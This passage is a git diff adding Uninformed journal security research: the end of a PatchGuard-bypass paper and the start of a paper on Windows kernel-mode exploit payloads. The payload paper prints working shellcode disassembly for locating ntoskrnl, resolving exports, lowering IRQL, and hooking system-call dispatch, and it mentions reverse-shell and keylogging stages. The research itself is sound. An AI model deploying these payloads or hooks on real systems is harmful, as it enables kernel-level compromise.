The implementations of the +approaches used to protect the various critical data structures +associated with the kernel, such as system images, SSDT, IDT/GDT, and +MSRs, have been explained in detail. + +With an understanding of the implementation of PatchGuard, it is only +fitting to consider ways it which it might be subverted. 
In that light, +this paper has proposed a few different techniques that could be used to +bypass PatchGuard that have either been proven to work or are theorized +to work. In the interest of not identifying a problem without also +proposing a solution, each bypass technique has an associated list of +ways in which the technique could be mitigated by Microsoft in the +future. + +Unfortunately, Microsoft is at a disadvantage with PatchGuard, and it's +one that they are perfectly aware of. This disadvantage stems from the +fact that PatchGuard is designed to run from the same protection domain +as the code that it is designed to protect from. In more concise terms, +PatchGuard runs just like any third-party driver, and it runs with the +same set of privileges. Due to this fact, it is impossible to guarantee +that a third-party driver won't be able to do something that will +prevent PatchGuard from being able to do its job since there is no way +for PatchGuard to completely protect itself. Since this problem was +known going into the implementation of PatchGuard, Microsoft chose to +use the only weapons readily available to them: obfuscation and +misdirection. While most consider security through obscurity to be no +security at all in the face of a sufficiently motivated engineer, it +does indeed raise the bar enough that most programmers and third-party +entities would not have the interest in finding a way to bypass it and +instead would be more motivated to find a condoned method of +accomplishing their goals. + +In cases such as this one it is sometimes important to take a step back +and consider if the avenue that has been taken is actually the right +one. In particular, Microsoft has decided to take an aggressive stance +against patching different parts of the kernel in the interest of making +Windows more stable. While this desire seems very reasonable and +logical, it comes at a certain cost. Due to the fact that Windows is a +closed source operating system, third-party software vendors sometimes +find themselves forced to bend the rules in order to accomplish the +goals of their product. This is especially true in the security industry +where security software vendors find themselves having to try to layer +deeper than malicious code. It could be argued that PatchGuard's +implementation will prevent the malicious techniques from being +possible, thus freeing up the security software vendors to more +reasonable points of entry. The fact of the matter is, though, that +while security software vendors may not make use of techniques used to +bypass PatchGuard due to marketing and security concerns, it can +certainly be said that malicious code will. As such, malicious code +actually gains an upper-hand in the competition since security vendors +end up with their hands tied behind their back. In order to address +this concern, Microsoft appears to be willing to work actively with +vendors to ensure that they are still able to accomplish their goals +through more acceptable and documented approaches. + +Another important question to consider is whether or not Microsoft will +really break a vendor that has deployed a solution to millions of +systems that happens to disable PatchGuard through a bypass technique. +One could feasibly see a McAfee or Symantec doing something like this, +although Microsoft would hope to leverage their business ties to ensure +that McAfee and Symantec did not have to resort to such a technique. 
+The fact that McAfee and Symantec are such large companies lends them a +certain amount of leverage when negotiating with Microsoft, but the +smaller companies are most likely going to not be subject to the same +level of respect and consideration. + +The question remains, though. Is PatchGuard really the right approach? +If one assumes that Microsoft will aggressively ensure that PatchGuard +breaks malicious code and software vendors who attempt to bypass it by +releasing updates in the future that intentionally break the bypass +approaches, which is what has been indicated so far, then it stands to +reason that Microsoft could be heading down a path that leads to the +kernel actually being more unstable due to more extreme measures being +required. Even if Microsoft extends its hand to other companies to +provide ways of hooking into the kernel at various levels, it will most +likely always be the case that there will be a task that a company needs +to accomplish that will not be readily possible without intervention +from Microsoft. Unless Microsoft is willing to provide these companies +with re-distributable code that makes it so third-party drivers will +work on all existing versions of x64, then the point becomes moot. +Compatibility is a key requirement not only for Microsoft, but also for +third-party vendors, and a solution that won't work on all versions of +the x64 kernel is no solution at all for most companies. + +If Microsoft were to go back in time and eliminate PatchGuard, what +other options might be exposed to them that could be used to supplement +the problem at hand? The answer to this question is very subjective, +but the authors believe that one way in which Microsoft could solve +this, at least in part, would be through a better defined and condoned +hooking model (like hooking VxD services in Windows 9x). The majority +of routines hooked by legitimate products are used by vendors to layer +between certain major subsystems, such as between the hardware and the +kernel or between user-mode and the kernel. Since the majority of +stability problems that third-party vendors introduce with runtime +patching have to do with incorrect or unsafe assumptions within their +hook routines, it would behoove Microsoft to provide a defined hooking +model that expressed the limitations and restrictions associated with +each function that can be hooked. While this might seem like a grand +undertaking, the fact of the matter is that it's not. + +By limiting the hooking model to exported routines, Microsoft could make +use of existing documentation that defines the behaviors and limitations +of the documented functions, such as their IRQL and calling +restrictions. While limiting the hooking model to exported functions +does not cover everything, it's at least a start, and the concepts used +to achieve it could be wrapped into an equally useful interface for +commonly undocumented or non-exported routines. The biggest problem with +this approach, however, is that it would appear to limit Microsoft's +control over the direction that the kernel takes, and in some ways it +does. However, it should already be safe to assume that exported +symbols, at least in relation to documented ones, cannot be eliminated +or largely changed after a release as to ensure backward compatibility. +This only serves to bolster the point that a defined hooking model for +documented, exported routines would not only be feasible but also +relatively safe. 
+ +Regardless of what may or may not have been a better approach, +the lack of a time machine makes the end result of the discussion mostly +meaningless. In the end, judging from the amount of work and thought +put into the implementation of PatchGuard, the authors feel comfortable +in saying that Microsoft has done a commendable job. Only time will +tell how effective PatchGuard is, both at a software and business level, +and it will be interesting to see how the field plays out. + + +AMD. The AMD x86-64 Architecture Programmers Overview. +http://www.amd.com/us-en/assets/contenttype/whitepapersandtechdocs/x86-64overview.pdf; +accessed Nov 30, 2005. + + +AMD. AMD64 Architecture Programmer's Manual Volume 3. +http://www.amd.com/us-en/assets/content_type/white_papers_and_tech_docs/24594.pdf; +accessed Dec 1, 2005. + + +Microsoft Corporation. Patching Policy for x64-Based Systems. +http://www.microsoft.com/whdc/driver/kernel/64bitPatching.mspx; +accessed Nov 28, 2005. diff --git a/uninformed/3.2.txt b/uninformed/3.2.txt new file mode 100644 index 0000000..f6b0f43 --- /dev/null +++ b/uninformed/3.2.txt @@ -0,0 +1,1490 @@ +Windows Kernel-mode Payload Fundamentals +bugcheck & skape +Dec 12, 2005 + +1) Foreword + + +Abstract: This paper discusses the theoretical and practical +implementations of kernel-mode payloads on Windows. At the time of this +writing, kernel-mode research is generally regarded as the realm of a +few, but it is hoped that documents such as this one will encourage a +thoughtful progression of the subject matter. To that point, this paper +will describe some of the general techniques and algorithms that may be +useful when implementing kernel-mode payloads. Furthermore, the anatomy +of a kernel-mode payload will be broken down into four distinct units, +known as payload components, and explained in detail. In the end, the +reader should walk away with a concrete understanding of the way in +which kernel-mode payloads operate on Windows. + +Thanks: The authors would like to thank Barnaby Jack and Derek Soeder +from eEye for their great paper on ring 0 payloads. Thanks also go out +to jt, spoonm, vax, and everyone at nologin. + +Disclaimer: The subject matter discussed in this document is presented +in the interest of education. The authors cannot be held responsible +for how the information is used. While the authors have tried to be as +thorough as possible in their analysis, it is possible that they have +made one or more mistakes. If a mistake is observed, please contact one +or both of the authors so that it can be corrected. + +Notes: In most cases, testing was performed on Windows 2000 SP4 and +Windows XP SP0. Compatibility with other operating system versions, +such as XP SP2, was inferred by analyzing structure offsets and +disassemblies. It is theorized that many of the implementations +described in this document are also compatible with Windows 2003 Server +SP0/SP1, but due to lack of a functional 2003 installation, testing +could not be performed. + +2) Introduction + + +The subject of exploiting user-mode vulnerabilities and the payloads +required to take advantage of them is something that has been discussed +at length over the course of the past few years. With this realization +finally starting to set in, security vendors have begun implementing +security products that are designed to prevent the exploitation of +user-mode vulnerabilities through a number of different techniques. 
+There is a shift afoot, however, and it has to do with attacker focus +being shifted from user-mode vulnerabilities toward the realm of +kernel-mode vulnerabilities. The reasons for this shift are due in part +to the inherent value of a kernel-mode vulnerability and to the +relatively unexplored nature of kernel-mode vulnerabilities, which is +something that most researchers find hard to resist. + +To help aide in the shift from user-mode to kernel-mode, this paper will +explore and extend the topic of kernel-mode payloads on Windows. The +reason that kernel-mode payloads are important is because they are the +method of actually doing something meaningful with a kernel-mode +vulnerability. Without a payload, the ability to control code execution +means nothing more than having the ability to cause a denial of service. +Barnaby Jack and Derek Soeder from eEye have done a great job in kicking +off the public research into this area. + +Just like user-mode payloads on Windows, kernel-mode payloads can be +broken down into general techniques and algorithms that are applicable +to most payloads. These techniques and algorithms will be discussed in +chapter . Furthermore, both user-mode and kernel-mode payloads can be +broken down into a set of payload components that can be combined +together to form a single logical payload. A payload component is +simply defined as an autonomous unit of a payload that has a specific +purpose. For instance, both user-mode and kernel-mode payloads have an +optional component called a stager that can be used to execute a second +logical payload component known as a stage. One major distinction +between kernel-mode and user-mode payloads, however, is that kernel-mode +payloads are burdened with some extra considerations that are not found +in user-mode payloads, and for that reason are broken down into a few +more distinct payload components. These extra components will be +discussed at length in chapter . + +The purpose of this document is to provide the reader with a point of +reference for the major aspects common to most all kernel-mode payloads. +To simplify terminology, kernel-mode payloads will be referred to +throughout the document as R0 payloads, short for ring 0, which +symbolizes the processor ring that kernel-mode operates at on x86. For +the same reason, user-mode payloads will be referred to throughout the +document as R3 payloads, short for ring 3. To fully understand this +paper, the reader should have a basic understanding of Windows +kernel-mode programming. + +In order to limit the scope of this document, the methods that can be +used to achieve code execution through different vulnerability scenarios +will not be discussed at length. The main reason for this is that +general approaches to payload implementation are typically independent +of the vulnerability in which they are used for. However, references to +some of the research in this area can be found in the bibliography for +readers who might be curious. Furthermore, this document will not +expand upon some of the interesting things that can be done in the +context of a kernel-mode payload, such as keyboard sniffing. Instead, +the topic of advanced kernel-mode payloads will be left for future +research. The authors hope that by describing the various elements that +will compose most all kernel-mode payloads, the process involved in +implementing some of the more interesting parts will be made easier. 
+ +With all of the formalities out of the way, the first leap to take is +one regarding an understanding of some of the general techniques that +can be applied to kernel-mode payloads, and it's there that the journey +begins. + +3) General Techniques + + +This chapter will outline some of the techniques and algorithms that are +generally applicable to most kernel-mode payloads. For example, +kernel-mode payloads may find it necessary to resolve certain exported +symbols for use within the payload itself, much the same as user-mode +payloads find it necessary. + +3.1) Finding Ntoskrnl.exe Base Address + + +One of the pre-requisites to nearly all user-mode payloads on Windows is +a stub that is responsible for locating the base address of +kernel32.dll. In kernel-mode, the logical equivalent to kernel32.dll is +ntoskrnl.exe, also known more succinctly as nt. The purpose of nt is to +implement the heart of the kernel itself and to provide the core library +interface to device drivers. For that reason, a lot of the routines +that are exported by nt may be of use to kernel-mode payloads. This +makes locating the base address of nt important because it is what +facilitates the resolving of exported symbols. This section will +describe a few techniques that can be used to locate the base address of +nt. + +One general technique that is taken to find the base address of nt is to +reliably locate a pointer that exists somewhere within the memory +mapping for nt and to scan down toward lower addresses until the MZ +checksum is found. This technique will be referred to as a scandown +technique since it involves scanning downward toward lower addresses. +This is completely synonymous with the mid-delta term used by eEye, but +just clarified to indicate a direction. In the implementations provided +below, each makes use of an optimization to walk down in PAGESIZE +decrements. However, this also adds four bytes to the amount of space +taken up by the stub. If size is a concern, walking down byte-by-byte +as is done in the eEye paper can be a great way to save space. + +Another thing to keep in mind with some of these implementations is that +they may fail if the /3GB boot flag is specified. This is not generally +very common, but it could be something that is encountered in the real +world. + +3.1.1) IDT Scandown + + +---------+----------+ + | Size: | 17 bytes | + | Compat: | All | + | Credit: | eEye | + +---------+----------+ + +The approach for finding the base address of nt discussed in eEye's +paper involved finding the high-order word of an IDT handler that was +set to a symbol somewhere inside nt. After acquiring the symbol address, +the payload simply walked down toward lower addresses in memory +byte-by-byte until it found the MZ checksum. The following disassembly +shows the approach taken to do this: + + +00000000 8B3538F0DFFF mov esi,[0xffdff038] +00000006 AD lodsd +00000007 AD lodsd +00000008 48 dec eax +00000009 81384D5A9000 cmp dword [eax],0x905a4d +0000000F 75F7 jnz 0x8 + + +This approach is perfectly fine, however, it could be prone to error +if the four checksum bytes were found somewhere within nt which did not +actually coincide with its base address. This issue is one that is +present to any scandown technique (referred to as ``mid-deltas'' by +eEye). However, scanning down byte-by-byte can be seen as potentially +more error prone, but this is purely conjecture at this point as the +authors are aware of no specific cases in which it would fail. 
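+
+For readers who find the assembly hard to follow, the scandown idea
+itself reduces to a few lines of C.  The sketch below is illustrative
+only (an actual payload must be written as position-independent
+assembly, like the stubs shown in this section) and it assumes the
+caller already has some pointer that is known to land within nt:
+
+
+PVOID FindNtBase(
+    IN PVOID AddressWithinNt)
+{
+    ULONG_PTR Address = (ULONG_PTR)AddressWithinNt & ~((ULONG_PTR)PAGE_SIZE - 1);
+
+    //
+    // Walk toward lower addresses one page at a time until the 'MZ'
+    // signature that marks the base of the image is found.
+    //
+    while (*(PUSHORT)Address != 0x5a4d)
+        Address -= PAGE_SIZE;
+
+    return (PVOID)Address;
+}
+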
The assembly version shown above may
+also fail if the direction flag is not cleared, though the chances of
+this happening are minimal.  One other limiting factor may be the
+presence of the NULL byte in the comparison.  It is possible to slightly
+improve (depending upon which perspective one is looking at it from)
+this approach by scanning downward one page at a time and by eliminating
+the need to clear the direction flag.  (It is not possible to walk
+downward in 16-page decrements because 16-page alignment is not
+guaranteed universally in kernel-mode.)  This also eliminates the
+presence of NULL bytes.  However, some of these changes lead to the code
+being slightly larger (20 bytes total):
+
+
+00000000  6A38              push byte +0x38
+00000002  5B                pop ebx
+00000003  648B03            mov eax,[fs:ebx]
+00000006  8B4004            mov eax,[eax+0x4]
+00000009  662501F0          and ax,0xf001
+0000000D  48                dec eax
+0000000E  6681384D5A        cmp word [eax],0x5a4d
+00000013  75F4              jnz 0x9
+
+
+3.1.2) KPRCB IdleThread Scandown
+
+
+ +---------+----------+
+ | Size:   | 17 bytes |
+ | Compat: | All      |
+ +---------+----------+
+
+The base address of nt can also be found by looking at the IdleThread
+attribute of the KPRCB for the current KPCR.  As it stands, this
+attribute always appears to point to a global variable inside of nt.
+Just like the IDT scandown approach, this technique uses the symbol as a
+starting point to walk down and find the base address of nt by looking
+for the MZ checksum.  The following disassembly shows how this is
+accomplished:
+
+
+00000000  A12CF1DFFF        mov eax,[0xffdff12c]
+00000005  662501F0          and ax,0xf001
+00000009  48                dec eax
+0000000A  6681384D5A        cmp word [eax],0x5a4d
+0000000F  75F4              jnz 0x5
+
+
+This approach will fail if it happens that the IdleThread attribute does
+not point somewhere within nt, but thus far a scenario such as this has
+not been observed.  It would also fail if the KPRCB structure were not
+found immediately after the KPCR, but this has not been observed in
+testing.
+
+3.1.3) SYSENTER_EIP_MSR Scandown
+
+
+ +---------+------------------------------------+
+ | Size:   | 19 bytes                           |
+ | Compat: | XP, 2003 (modern processors only)  |
+ +---------+------------------------------------+
+
+For processors that support the system call MSR 0x176
+(SYSENTER_EIP_MSR), the base address of nt can be found by reading the
+registered system call handler and then using the scandown technique to
+find the base address.  The following disassembly illustrates how this
+can be accomplished:
+
+
+00000000  6A76              push byte +0x76
+00000002  59                pop ecx
+00000003  FEC5              inc ch
+00000005  0F32              rdmsr
+00000007  662501F0          and ax,0xf001
+0000000B  48                dec eax
+0000000C  6681384D5A        cmp word [eax],0x5a4d
+00000011  75F4              jnz 0x7
+
+
+3.1.4) Known Portable Base Scandown
+
+
+ +---------+--------------------+
+ | Size:   | 17 bytes           |
+ | Compat: | 2000, XP, 2003 SP0 |
+ +---------+--------------------+
+
+A quick sampling of base addresses across different major releases shows
+that the base address of nt is always within a certain range.  The one
+exception to this in the sampling was Windows 2003 Server SP1, and for
+that reason this payload is not compatible.  The basic idea is to simply
+use an offset that is known to reside within the region that nt will be
+mapped at on different operating system versions.
The table below +describes the mapping ranges for nt on a few different samplings: + + + +------------------+--------------+-------------+ + | Platform | Base Address | End Address | + +------------------+--------------+-------------+ + | Windows 2000 SP4 | 0x80400000 | 0x805a3a00 | + | Windows XP SP0 | 0x804d0000 | 0x806b3f00 | + | Windows XP SP2 | 0x804d7000 | 0x806eb780 | + | Windows 2003 SP1 | 0x80800000 | 0x80a6b000 | + +------------------+--------------+-------------+ + + +As can be seen from the table, the address 0x8050babe resides within +every region that nt could be mapped at except for Windows 2003 Server +SP1. The payload below implements this approach: + + +00000000 B8BEBA5080 mov eax,0x8050babe +00000005 662501F0 and ax,0xf001 +00000009 48 dec eax +0000000A 6681384D5A cmp word [eax],0x5a4d +0000000F 75F4 jnz 0x5 + + +3.2) Resolving Symbols + + +---------+----------+ + | Size: | 67 bytes | + | Compat: | All | + +---------+----------+ + + +Another aspect common to almost all payloads on Windows is the use of +code that walks the export directory of an image to resolve the address +of a symbol The technique of walking the export directory to resolve +symbols has been used for ages, so don't take the example here to be the +first ever use of it. In the kernel, things aren't much different. +Barnaby refers to the use of a two-byte XOR/ROR hash in the eEye paper. +Alternatively, a four byte hash could be used, but as pointed out in the +eEye paper, this leads to a waste of space when two-byte hash could +suffice equally well provided there are no collisions. + +The approach implemented below involves passing a two-byte hash in the +ebx register (the high order bytes do not matter) and the base address +of the image to resolve against in the ebp register. In order to save +space, the code below is designed in such a way that it will transfer +execution into the function after it resolves it, thus making it +possible to resolve and call the function in one step without having to +cache addresses. In most cases, this leads to a size efficiency +increase. + + +00000000 60 pusha +00000001 31C9 xor ecx,ecx +00000003 8B7D3C mov edi,[ebp+0x3c] +00000006 8B7C3D78 mov edi,[ebp+edi+0x78] +0000000A 01EF add edi,ebp +0000000C 8B5720 mov edx,[edi+0x20] +0000000F 01EA add edx,ebp +00000011 8B348A mov esi,[edx+ecx*4] +00000014 01EE add esi,ebp +00000016 31C0 xor eax,eax +00000018 99 cdq +00000019 AC lodsb +0000001A C1CA0D ror edx,0xd +0000001D 01C2 add edx,eax +0000001F 84C0 test al,al +00000021 75F6 jnz 0x19 +00000023 41 inc ecx +00000024 6639DA cmp dx,bx +00000027 75E3 jnz 0xc +00000029 49 dec ecx +0000002A 8B5F24 mov ebx,[edi+0x24] +0000002D 01EB add ebx,ebp +0000002F 668B0C4B mov cx,[ebx+ecx*2] +00000033 8B5F1C mov ebx,[edi+0x1c] +00000036 01EB add ebx,ebp +00000038 8B048B mov eax,[ebx+ecx*4] +0000003B 01E8 add eax,ebp +0000003D 8944241C mov [esp+0x1c],eax +00000041 61 popa +00000042 FFE0 jmp eax + + +To understand how this function works, take for example the resolution +of nt!ExAllocatePool. First, a hash of the string ``ExAllocatePool'' +must be obtained using the same algorithm that the payload uses. For +this payload, the result is 0x0311b83f This was calculated by doing perl +-Ilib -MPex::Utils -e "printf .8x, +Pex::Utils::Ror(Pex::Utils::RorHash("ExAllocatePool"), 13);". Since the +implementation uses a two-byte hash, only 0xb83f is needed. This hash is +then stored in the bx register. Since ExAllocatePool is found within +nt, the base address of nt must be passed in the ebp register. 
Finally, +in order to perform the resolution, the arguments to nt!ExAllocatePool +must be pushed onto the stack prior to calling the resolution routine. +This is because the resolution routine will transfer control into +nt!ExAllocatePool after the resolution succeeds and therefore must have +the proper arguments on the stack. + +One downside to this implementation is that it won't support the +resolution of data exports (since it tries to jump into them). However, +for such a purpose, the routine could be modified to simply not issue +the jmp instruction and instead rely on the caller to execute it. It is +also important for payloads that use this resolution technique to clear +the direction flag with cld. + +4) Payload Components + + +This chapter will outline four distinct components that can be used in +conjunction with one another to produce a logical kernel-mode payload. +Unlike user-mode vulnerabilities, kernel-mode vulnerabilities tend to be +a bit more involved when it comes to considerations that must be made +when attempting to execute code after successfully exploiting a target. +These concerns include things like IRQL considerations, setting up code +for execution, gracefully continuing execution, and what action to +actually perform. Some of these steps have parallels to user-mode +payloads, but others do not. + +The first consideration that must be made when implementing a +kernel-mode payload is whether or not the IRQL that the payload will be +running at is a concern. For instance, if the payload will be making +use of functions that require the processor to be running at +PASSIVE_LEVEL, then it may be necessary to ensure that the processor is +transitioned to a safe IRQL. This consideration is also dependent on +the vulnerability in question as to whether or not the IRQL will even be +a problem. For scenarios where it is a problem, a migration payload +component can be used to ensure that the code that requires a specific +IRQL is executed in a safe manner. + +The second consideration involves staging either a R3 payload (or +secondary R0 payload) to another location for execution. This payload +component is encapsulated by a stager which has parallels to payload +stagers found in typical user-mode payloads. Unlike user-mode payloads, +though, kernel-mode stagers are typically designed to execute code in +another context, such as in a user-mode process or in another +kernel-mode thread context. As such, stagers may sometimes overlap with +the purpose of the migration component, such as when the act of staging +leads to the stage executing at a safe IRQL, and can therefore be +considered a superset of a migration component in that case. + +The third consideration has to do with how the payload gracefully +restores execution after it has completed. This portion of a +kernel-mode payload is classified as the recovery component. In short, +the recovery component of a payload finds a way to make sure that the +kernel does not crash or otherwise become unusable. If the kernel were +to crash, any code that the payload had intended to execute may not +actually get a chance to run depending on how the payload is structured. +As such, recovery is one of the most volatile and critical aspects of a +kernel-mode payload. + +Finally, and most importantly, the fourth component of a kernel-mode +payload is the stage component. It is this component that actually +performs the real work of the payload. 
For instance, a stage component +might detect that it's running in the context of lsass.exe and create a +reverse shell in user-mode. As another example of a stage component, +eEye demonstrated a keyboard hook that sent keystrokes back in ICMP echo +responses from the host. Stages have a very broad definition. + +The following sections will explain each one of the four payload +components in detail and offer techniques and implementations that can +be used under certain situations. + +4.1) Migration + + +One of the things that is different about kernel-mode vulnerabilities in +relation to user-mode vulnerabilities is that the Windows kernel +operates internally at specific Interrupt Request Levels, also known as +IRQLs. The purpose of IRQLs are to allow the kernel to mask off +interrupts that occur at a lower level than the one that the processor +is currently executing at. This ensures that a piece of code will run +un-interrupted by threads and hardware/software interrupts that have a +lesser priority. It also allows the kernel to define a driver model +that ensures that certain operations are not performed at critical +processor IRQLs. For instance, it is not permitted to block at any IRQL +greater than or equal to DISPATCH_LEVEL. It is also not permitted to +reference pageable memory that has been paged out at greater than or +equal to DISPATCH_LEVEL. + +The reason this is important is because the IRQL that the processor will +be running at when a kernel-mode vulnerability is triggered is highly +dependent upon the area in which the vulnerability occurs. For this +reason, it may be generally necessary to have an approach for either +directly or indirectly lowering the IRQL in such a way that permits the +use of some of the common driver support routines. As an example, it is +not possible to call nt!KeInsertQueueApc at an IRQL greater than +PASSIVE_LEVEL. + +This section will focus on describing methods that could be used to +implement migration payloads. The purpose of a migration payload is to +migrate the processor to an IRQL that will allow payloads to make use of +pageable memory and common driver support routines as described above. +The techniques that can be used to do this vary in terms of stability +and simplicity. It's generally a matter of picking the right one for +the job. + +4.1.1) Direct IRQL Adjustment + + + +---------+------------------+ + | Type: | R0 IRQL Migrator | + | Size: | 6 bytes | + | Compat: | All | + +---------+------------------+ + + +One of the most straight-forward approaches that can be taken to migrate +a payload to a safe IRQL is to directly lower a processor's IRQL. This +approach was first proposed by eEye and involved resolving and calling +hal!KeLowerIrql with the desired IRQL, such as PASSIVE_LEVEL. This +technique is very dangerous due to the way in which IRQLs are intended +to be used. The direct lowering of an IRQL can lead to machine +deadlocks and crashes due to unsafe assumptions about locks being held, +among other things. + +An optimization to the hal!KeLowerIrql technique is to perform the +operation that hal!KeLowerIrql actually performs. Specifically, +hal!KeLowerIrql is a simple wrapper for hal!KfLowerIrql which adjusts +the Irql attribute of the KPCR structure for a specific processor to the +supplied IRQL (as well as calling software interrupt handlers for masked +IRQLs). 
To implement a payload that migrates to a safe IRQL, all that is
+required is to adjust the value at fs:0x24, such as by lowering it to
+PASSIVE_LEVEL as shown below (in kernel-mode, the fs segment points to
+the current processor's KPCR structure):
+
+
+00000000 31C0      xor eax,eax
+00000002 64894024  mov [fs:eax+0x24],eax
+
+
+One concern about taking this approach over calling hal!KeLowerIrql is
+that the soft-interrupt handlers associated with interrupts that were
+masked while at a raised IRQL will not be called. It is unclear whether
+or not this could lead to a deadlock, but it is theorized that the
+answer could be yes. However, the authors did test writing a driver that
+raised the IRQL to HIGH_LEVEL, spun for a period of time (during which
+keyboard/mouse interrupts were sent), and then manually adjusted the
+IRQL as described above. There appeared to be no adverse side effects,
+but it has not been ruled out that a deadlock could be possible.
+Consequently, if anyone knows a definitive answer to this, the authors
+would love to hear it.
+
+Aside from the risks, this approach is nice because it is very small (6
+bytes), so assuming there are no significant problems with it, the use
+of this method would be a no-brainer given the right set of
+circumstances for a vulnerability.
+
+4.1.2) System Call MSR/IDT Hooking
+
+
+ +---------+------------------+
+ | Type:   | R0 IRQL Migrator |
+ | Size:   | 97 bytes         |
+ | Compat: | All              |
+ +---------+------------------+
+
+One relatively simple way of migrating an R0 payload to a safe IRQL is
+by hooking the function used to dispatch system calls in kernel-mode
+through the use of a processor model-specific register. In newer
+processors, system calls are dispatched through an improved interface
+that takes advantage of a registered function pointer that is given
+control when a system call is dispatched. The function pointer is
+stored within the SYSENTER_EIP_MSR model-specific register, which has a
+symbolic code of 0x176.
+
+To take advantage of this on Windows XP+ for the purpose of payload
+migration, all that is required is to first read the current state of
+the MSR so that the original system call dispatcher routine can be
+preserved. After that, the second stage of the R0 payload must be copied
+to another location, preferably one that is globally accessible and
+unused, such as SharedUserData or the KPRCB. Once the second stage has
+been copied, the value of the MSR can be changed to point to the first
+instruction of the now-copied stage. The end result is that whenever a
+system call is dispatched from user-mode, the second stage of the R0
+payload will be executed at PASSIVE_LEVEL.
+
+For Windows 2000, and for versions of Windows XP+ running on older
+hardware, another approach is required that is virtually equivalent.
+Instead of changing the processor MSR, the IDT entry for the 0x2e
+soft-interrupt that is used to dispatch system calls must be hooked so
+that whenever the soft-interrupt is triggered the migrated R0 payload is
+called. The steps taken to copy the second stage to another location
+are the same as they would be under the MSR approach.
+
+The following steps outline one way in which a stager of this type could
+be implemented for Windows 2000 and Windows XP.
+
+1. Determining which system call vector to hook.
+
+By checking KUSER_SHARED_DATA.NtMinorVersion located at 0xffdf0270 for a
+value of 0, it is safe to assume that the IDT will need to be hooked,
+since the syscall/sysenter instructions are not used in Windows 2000;
+otherwise, the hook should be installed in MSR 0x176. Note, however,
+that it is possible Windows XP will not use this method under rare
+circumstances. An assumption is also made that NtMajorVersion is 5.
+
+2. Caching the existing service routine address
+
+If the MSR is to be hooked, the current value can be retrieved by
+placing the symbolic code of 0x176 in ecx and using the rdmsr
+instruction. The existing value will be returned in edx:eax. If the IDT
+entry at index 0x2e is to be hooked, it can be retrieved by first
+obtaining the processor's IDT base using the sidt instruction. The entry
+can then be located at offset 0x170 relative to the base since the IDT
+is an array of KIDTENTRY structures. Lastly, the address of the code
+that services the interrupt is stored in the KIDTENTRY structure, with
+the low word at Offset and the high word at ExtendedOffset. The
+following is the definition of KIDTENTRY.
+
+
+KIDTENTRY
++0x000 Offset          : Uint2B
++0x002 Selector        : Uint2B
++0x004 Access          : Uint2B
++0x006 ExtendedOffset  : Uint2B
+
+
+3. Migrating the payload
+
+A relatively safe place to migrate the payload to is the free space
+after the first processor's KPCR structure. An arbitrary value of
+0xffdffd80 is used to cache the current service routine address and the
+remainder of the payload is copied to 0xffdffd84, followed by an
+indirect jump to the original service routine using jmp [0xffdffd80].
+Note that with this implementation the payload is responsible for
+preserving all registers before calling the original service routine.
+The payload also may not exceed the end of the memory page, thus
+limiting its size to 630 bytes. Historically, R0 shellcode has been put
+in the space after SharedUserData since it is exposed to all processes
+at R3. However, that could have its disadvantages if the payload has no
+requirement to be accessed from R3. The downside is the smaller amount
+of free space available.
+
+4. Hooking the service routine
+
+The same methods described above for caching the current service
+routine are used to install the hook. For hooking the IDT, interrupts
+are temporarily disabled to overwrite the KIDTENTRY Offset and
+ExtendedOffset fields. Disabling interrupts on the current processor
+will still be safe in multiprocessor environments since IDTs are
+maintained on a per-processor basis. For hooking the MSR, the new
+service routine is placed in edx:eax (in this case 0x0:0xffdffd84),
+0x176 is placed in ecx, and a wrmsr instruction is issued.
+
+
+The following code illustrates an implementation of this type of staging
+payload. It's roughly 97 bytes in size, excluding the staged payload and
+the recovery method. Removing the support for hooking the IDT entry
+reduces the size to roughly 47 bytes.
+ + +00000000 FC cld +00000001 BF80FDDFFF mov edi,0xffdffd80 +00000006 57 push edi +00000007 6A76 push byte +0x76 +00000009 58 pop eax +0000000A FEC4 inc ah +0000000C 99 cdq +0000000D 91 xchg eax,ecx +0000000E 89F8 mov eax,edi +00000010 66B87002 mov ax,0x270 +00000014 3910 cmp [eax],edx +00000016 EB06 jmp short 0x1e +00000018 50 push eax +00000019 0F32 rdmsr +0000001B AB stosd +0000001C EB3E jmp short 0x5c +0000001E 648B4238 mov eax,[fs:edx+0x38] +00000022 8D4408FA lea eax,[eax+ecx-0x6] +00000026 50 push eax +00000027 91 xchg eax,ecx +00000028 8B4104 mov eax,[ecx+0x4] +0000002B 668B01 mov ax,[ecx] +0000002E AB stosd +0000002F EB2B jmp short 0x5c +00000031 5E pop esi +00000032 6A01 push byte +0x1 +00000034 59 pop ecx +00000035 F3A5 rep movsd +00000037 B8FF2580FD mov eax,0xfd8025ff +0000003C AB stosd +0000003D 66C707DFFF mov word [edi],0xffdf +00000042 59 pop ecx +00000043 58 pop eax +00000044 0404 add al,0x4 +00000046 85C9 test ecx,ecx +00000048 9C pushf +00000049 FA cli +0000004A 668901 mov [ecx],ax +0000004D C1E810 shr eax,0x10 +00000050 66894106 mov [ecx+0x6],ax +00000054 9D popf +00000055 EB04 jmp short 0x5b +00000057 31D2 xor edx,edx +00000059 0F30 wrmsr +0000005B C3 ret ; replace with recovery method +0000005C E8D0FFFFFF call 0x31 + +... R0 stage here ... + +4.1.3) Thread Notify Routine + + + +---------+------------------+ + | Type: | R0 IRQL Migrator | + | Size: | 127 bytes | + | Compat: | 2000, XP | + +---------+------------------+ + + +Another technique that can be used to migrate a payload to a safe IRQL +involves setting up a thread notify routine which is normally done by +calling nt!PsSetCreateThreadNotifyRoutine. Unfortunately, the +documentation states that this routine can only be called at +PASSIVE_LEVEL, thus making it appear as if calling it from a payload +would lead to problems. While this is true, it is also possible to +manually create a notify routine by modifying the global array of thread +notify routines. Although this array is not exported, it is easy to +find by extracting an address reference to it from one of either +nt!PsSetCreateThreadNotifyRoutine or +nt!PsRemoveCreateThreadNotifyRoutine. By using this basic approach, it +is possible to write a migration payload that transitions to +PASSIVE_LEVEL by registering a callback that is called whenever a thread +is created or deleted. + +In more detail, a few steps must be taken in order to get this to work +properly on 2000 and XP. The steps taken on 2003 should be pretty much +the same as XP, but have not been tested. + +1. Find the base address of nt + +The base address of nt must be located so that an exported symbol can be +resolved. + +2. Determine the current operating system + +Since the method used to install the thread notify routines differ +between 2000 and XP, a check must be made to see what operating system +the payload is currently running on. This is done by checking the +NtMinorVersion attribute of KUSER_SHARED_DATA at 0xffdf0270. + +3. Shift edi to point to the storage buffer + +Due to the fact that it can't be generally assumed that the buffer the +payload is running from will stick around until the notify routine is +called, the stage associated with the payload must be copied to another +location. In this case, the payload is copied to a buffer starting at +0xffdf04e0. + +4. 
